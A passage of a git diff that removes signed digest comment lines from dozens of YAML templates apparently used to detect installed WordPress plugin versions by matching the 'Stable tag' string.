a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bfe4b78e10b674b1083f0a12b8d1a4e4e65f320da45251029b96abd3537a4e0b02204483ae486d6d2fd4a8e0b0bcd229fde840764a0996d03dbf47dbf5218950dafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index ca15049893..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e08c841bb5399a2ea23d95f4ee289feaaa0c27705d9314c1202a931ed7c8c91022100e95c87c44b1fbe60d808ba3990eff56eab4cfdcddcc1905c446113ac0ca30c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 427a4f4d2a..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b2b1d87051c6fe7567403a76bf18f720135f66992506ae3ed2be80e655036ab0221009c8768644a8d5fe951783b52e89eb5671cb935734f0ddfc46762700b7c5130fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 0da0134b71..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7c9e7c74a5e4d95960bb0780027aac378d0d9554ff6e3be313472b323f6d5c5022100edb34fd121baf93ccd889fe35aa9f78d754b4efd7b22e53189df495dbf710108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 025e00ac5a..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e41d7f6b6650450e5d0b12eaf7e54212d6adca18c7bf885266cc161e691082402207e8e73b4df4e21dd23cc47726d1859e7322e83276083aeb46095472276c1ce37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 3921b45b34..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a86e2aa726400f7503dace36e05463574c5c42675879bf370c36734160e08927022064afd7ff65664937033ec9e7daf47228a2d1ece8e67b74775df7765462893e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 020cc39aa3..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e09b269c963b2d466e2b4461bd2b1e34ce44515e1726bbf1dfd972f14189ac2402201b572fe490b50632cd85404e9e004218ebe37d16021ae3290eeab233302feb2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1580eec5b1..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aab350f3dcc088fc8642c6ec38f617201b45e6a08b0219cf89754a58b3a9d2360220574a35a4907c849648db8f7ec9e5ce2a9903fc825a0f6de348760122e1e921a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 1d373951b7..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dcb22bb64e4a2b62a6d427b459abed5e585cd156f758b14ff2e7111793b4fe6d02201d199f49c15a1af1fa0d92b3bd4973e5b74b4e4c81b6ac16ed4190afec0ef7f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 4e34592599..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c588b94ad7b1ba13002b321cd539213a4890b24e239288968a543b2a371f7343022028b9b7847c7a7bb5bd657df3f815e7216ff27aa09cb4293bcfb8afdea91d4ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 990f77bb62..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100814c1784742c116a56f46f93f7cce06de7a9670b94d1c2c4b5a698fd720095310221009498a7d2e04db2adb5f98f8483e4c0813d36daa1d086cfa52a7584af5cdcc0e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 76f04102f8..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206389702b585158c9330a287c18cff7343e5408702cfe04191ec3885265593714022100d2cfdbfd26cf261253d7024d5108f75c13962895bc5d0a2fe7832444ae47ee96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index b495c2fd71..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000a930b03da6378acb15358fa1aadc71783dbe29fc81507aa8db14ea49ed56a50221008008f3099d569469f2abfec8674a9ba44663213ae450d6168dc4ecdfcfa3741c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index d1c6abf13b..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eb56a3d16277582fd7680a872a9479242ba4bbd758ac40fa2790a4734516074f02210094487b6015cfbd6e4880b73484bee39ebbfb7e4ff5044e62207402dacd98ebc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 953efec677..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aac2fb65b5c35854d9661f779dbb8aba47f754bd7a94174e0df7702024cce30d022100e5a13a7604956d9e31b92f9a089acda9c5e101745e98d7796c7a17336834c50c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 38e50969bb..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b58ee8ea24bfebaa8c947fa2d8053f7a4249f8d9971f44c58bc0a94e3402c530022100b3ef8073e109771d6b5379fb4b04e7d68a5b17e7cf18115fff6702f07deb11e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index ef8fdc7f8e..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c02db1e1dc9c5c31fb702724b74efa0c161dca561308c0bc05b25f73b5d35c50022100999fab0545c5cbc473525b5347b14b7273b337465d47c752e2743617d82fd805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index e9d5307661..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085973eccb0528762e742261706b0636f3c90f97b6caf73fff8ab81dfc8b237dd022100b11747e1e6fdf09855145438ee3719bbb957919e4185ef96b6dc5a0b2f59f9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 48179726ca..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd3e5d6495c9353564f8bd039717cfec1c8bcd1cc355aaa1185502f09e09bf8c02210081fc3b5f5be84702592914dac5bc98ff8c063610a0068b79f6261c005bc166bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index ed865d06bd..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d41282ec81ef9258c5c903b819c479f89c91c5b8458835c8e1a10547f6689418022100c4f4aad9e19c2b7319ac504e24cb64597fe515d782175a6d5a237c1ede2c9b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index f3ba73cdfc..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a1e31d192f32a57be2f88c07dead074782e7e897b3809b3d4d0c230971be58202206fd7a5783ed16d293cd5c0eb56397165534bf87a77bdd68301e14f467a58f681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index aca9ab4ee3..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100834e309fee6b38ad469ba1bb6a5cf72f9f0df407fe2dcf6f9945f52f20a9bdcf022100dd157196036f4d6a41948cfd77decc887318e50b81c8d1ea0e090b6638f8c7a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 767938eb9c..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024bcc4bcb7ae7ed9474052942dcb8fbb4e23c2ff023fcb3e9bd70c77126e5c5502201e8516e3f7b5dfb97ed0f074a4059e7b1d34916ca5aec02af232955b03d9075d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 925e533ec7..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064f5b57a253fc8694c776dd57ea50d232f9ecf332489b97d086b855b7a844b1e022030e63d881654934517cdea9b57e82770711ab777987b65472cba414fc2a86d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index dc70eadd43..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b8215f9a920ef042d984dfbef99970e2fe3f592f05904510b00b46391c7b1e20221008af77589464339c020d0956104c71388ae09d8fde6c4ddbe551ec6443d9d73d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index c25aebea7d..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008af1cea4f7f716f33a7f99c3442ad65eeab25946e2b9e66638f2faab1ba427cc0221008d9efec8129e7471a282b135f7d8c32efcc80690fdb7787849398e2fdd563e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 987178ebe9..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009aed91a1a7bafe89496aec46a0b0b0a3c74e84d6326ed00a2182594ce806750302204f2c720a0d5871a182d28de866fd549cfdd253574fe4e87045e52778bc704156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 0869974979..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220323af72842f53b591b5fe909644d6033bf57cb6568276252a3ac4392c04910270220534a33ea4b8b579862cc0025c31a511d6536c9f4006404336041b07510c3ab0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index db51d90833..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200fb657a278f5cec6f184504864956629dbb95315c3d408a6e7a930d129debeaa022100b942da3e0147f8ac616b58ed0cb024e411b0f4c688f64074711e2242bbfb1f2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 45494721f7..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb9570b0c0fcf1cdc9d2df8d18704006f8236f05f4eb1fc6caa30208c225070902201514380ca01da0dd074678dddf841f2eeedd8c381736f378bc9deae7238ccc03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 79a5a83393..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022072f8673849fce41dc24e7b779a09b59f033eb8354eb4040750ff7e1039378be3022100e663678da320fefdf903317aabcb9f00fd4bd33e2f655a43f72dde521c3efdc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index bad78e7a0c..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053e2cad3a17e0cd229aee0ffb49283ad7fba15510651fc1f74377e2f0ee3e9dd022100b98644ebe15097d12c123fbc9092911427efaba878f38b771b80ee5d6576e522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 1cbc910275..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef747795c419b4dc2eab45ad22ff8afd8c00f8961ada087559704b443f0f40320221008f51d6d8d888e76dd0d01ac826f4147eed532615f1a2ecbecca9cebcf306a801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index a006073354..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220575f3da25e08e7359033e37696568d5ae5cfeb53e048890f16ac9b551ea964d5022100f021c44001b9c753bd6bc5c615fd951c4be9bae4ba8626303203f5610cb0547f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index a8fcb984f7..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d097ed0d67e34d98eb0d9d5ae81c31ffa709551834e3d09ddd48fbdee61a2bd0220128bd91e2c0ecce4cc5204cf433fb1ee5f1643fb4bbf07ef62566201fdb8a8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 0bcc326e25..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d71ae447da0acaa3d47d9c793f110de18ddfd78d0beca6e6dd9256cec60c2cab022100adc8f618cb95625032f34b257bc96546d16e2474fa277ec1fa625c0332f8bba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index f789f0c67b..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb8c4a3528ca69521db99f4482068d769fa7460f2a665311a238ff64057a70410221008ec0bcf392cc11b84ead7863869594d57531903d7ea133b5d83bf4400a3d68c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index bc4a300756..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089c8db51a0d64802c7cd64668c4a63a6b077d1f0e3b01a15b6cd914477c8c1e3022100d5e76ba20bcda6ec5181ee77d484e7419728d9c7d722fc7f18515cf89b804fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 57e7080720..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200412383001a535dbe1db8b9a2e1a4f8ffdc4be55bc3aa2f6f17411cf69b847c6022100f9c2df846212fa96c3327eec234c6c758c105af874cd3f183b400e980784b6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 8e5c4fd9c7..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012846a7ac2c5b55c33327a4a6a175615ef328cbd575c5211c0721755ff4fee31022067bf4e3c926c63b5a33a395f78eebc7606310993ff724ba0e29e67b4abca238b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 4fb6384545..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b410f16998b2183ce860ee15dae98f833d09d3d830cec1ecee54c715eef69e64022067dad85683cac910313432e5803df84e6fed7735c5fa3c5d26533b29bbd0cd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 630adc7262..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202931e718a7ed1fe5ce3127eaa63b2bce379ed425f69a8f25004c446fd92144910221009b3a76b580bd9a9667c12e67bfba85aac2ed5e0bff2b5f21a5185e7139bf6cc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 62702f0e63..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e7b117dd8793a3472b6327f913102a0275e3ec3fe1befe86dcc68acf9d285d802204a0e0769802354ef4a70e8a6d58c928d30655d5cce222c6fc79d13cfe1293ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 816209079d..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205245649163a47e5a199084ff73150f3a6ff4617dc8b4d4925134e53494e707a3022100f47c84764cf087468ac853a85eb51b280fd89313776e18e3708caef85a8b7fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index d41e212955..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8d7c906c2e9cca88af3c58c7d8ecabb94153310039d17dde1bfdc3375d682c2022055a100dcfbcb33ef8d108bf902110fcf9fa9c02dd0d4150bea7bd0558a1e1465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index dfbe49cb14..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200690eb466dedf9e3c3cdf3e9b886ae03f0312b33b0a0479b3c99caa36929b32d0221009880f3409e877cb8c41b7b6506d765b0391323f4d0dc99e05debe8b0f258bf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index ebb53c8598..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1b4a6250a03bcb918a374d7eae1b6764426c43e5cc0fb0dc8b409cc1f8b7097022036d7dc1e5a181cff7497c008ded97216ffb345e0d5bd6de0bf136bb689ebdc5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml 